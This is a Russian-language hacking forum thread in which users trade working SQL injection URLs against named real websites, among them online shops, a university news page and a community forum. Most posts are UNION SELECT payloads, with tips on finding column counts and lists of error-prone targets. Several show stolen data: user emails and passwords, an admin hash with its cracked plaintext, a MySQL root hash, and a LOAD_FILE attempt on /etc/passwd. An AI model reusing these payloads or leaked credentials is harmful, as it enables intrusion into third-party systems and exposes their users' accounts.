SQL Инъекции

хмм и админка на виду
Total Members: 3776

 

2Thanat0z
для перебора можно использывать специальные тулзы, если не дает результата то уже ручками, просто иногда бывает что в таблице 50-60 столбцов...

 

или через order by

 

я знаю, скриптик выкладывали в "полезные скрипты". Иногда просто нет предпосылок в виде "не то количество колонок", и такие я руками пробую, а иначе скриптом после 10 где-то. Если не катит через юнионселект, пробую через ордербай

 

http://www.eclectichomeschool.org/support/state.asp?stateid=(select+top+1+table_name+from+information_schema.tables)--

 

Инет-магазины (почти все):

Не нашел таблиц, лоадфайл вроде не работает:

Code:

__http://www.magic-pony.com/product.php?id=-1894+union+select+1,2,3,4,5,6,user,8,9,10,11,12,13,14/*&category=art
__http://www.shopmuseum.com/category.php?id=18&sub_id=-123'+union+select+1,2,3,4,user(),6,7/*

ошибки:

Code:

__http://amvets.fundlinkllc.com/showcategory.php?id=61'
__https://shop.invictusnetworks.com/detail.php?id=16026'
__http://www.usenetportal.com/detail.php?id=713'
__http://www.alicebxl.com/artsale.php?id=16'
__http://www.rocbattle.com/battle_details.php?id=37519'

странное чувство, что здесь есть скуль, сам не нашел:

Code:

__http://www.juniperresearch.com/shop/viewreport.php?id=-28'
__http://www.juniperresearch.com/shop/viewpressrelease.php?pr=-44'

 

Thanat0z,

Code:

http://www.shopmuseum.com/category.php?id=18&sub_id=-123'+union+select+1,2,3,concat(email,0x3a,password),5,6,7+from+customers/*

[email protected]:flash62

тут email=login

 

Code:

http://www.mikeosx.com/newsphp/show.php?id=-99+union+select+1,2,3,4,concat(name,0x3a,pass),6,7,8,9,10+from+users+limit+1,1/*

powermic:52609e00b7ee307e79eb100099b9a8bf
powermic:fingerprint

Code:

http://www.foxreality.com/show.php?id=-99+union+select+1,column_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33+from+INFORMATION_SCHEMA.COLUMNS+WHERE+table_name=0x545f7573657273+limit+23,1/*

etc...
=\

 

_http://www.fotosale.com.ua/index.php?mod=prodList&cid=1&bid=-99+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,15,6,17/*

как всегда с названием таблци юзверей проблема((

 

Code:

http://www.nregion.com/txt.php?i=-8943+union+select+1,concat(user,0x3a,password),3,4,5,6,7,8,9+from+mysql.user/*

root:*2E4549A9308C1DFA3E3A1645E3CFD8E787134CBC

 

Code:

http://www.nregion.com/txt.php?i=-8943+union+select+1,LOAD_FILE(0x2f6574632f706173737764),3,4,5,6,7,8,9/*

=\

 

А чего смайл перекошеный?) и нафига тебе /etc/passwd если хэш рута есть?))

 

http://www.rochester.edu/news/show.php?id=27654%20or%201=1/*
бесит уже 5 раз подряд не могу столбцы подобрать
2 none - root от бд, а ему может от сервака пароли нужны

 

мне они вообще не нужны...

 

53k юзеров

 

Code:

http://www.linuxcd.org/view_distro.php?lst=&id_cate=12&id_distro=-99+union+select+1,2,concat(admin_name,0x3a,admin_pass),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+from+admin/*

=\

 

еврейская община
http://www.jewish.ru/forum/index.php?page=1&idt=15647'%20union%20select%201,2,3,4,5,6,email,8,9,passwd,11,12,13,14%20from%20%20user/*

 

Termin@L, ты собираешься пароли в /etc/passwd смотреть?

 

_http://www.monitoroflife.com/?a=details&lid=70+union+select+1*/
типа этого :
_http://www.hyipranks.com/?a=details&lid=2575+union+select+1*/
Два одинаковых движка , но реализовать хз как , т.к. используется много запросов.

 

обнаружено: троянская программа Trojan-Downloader.JS.Agent.bx Скрипт: http://www.monitoroflife.com/?a=details&lid=70+union+select+1*/[6]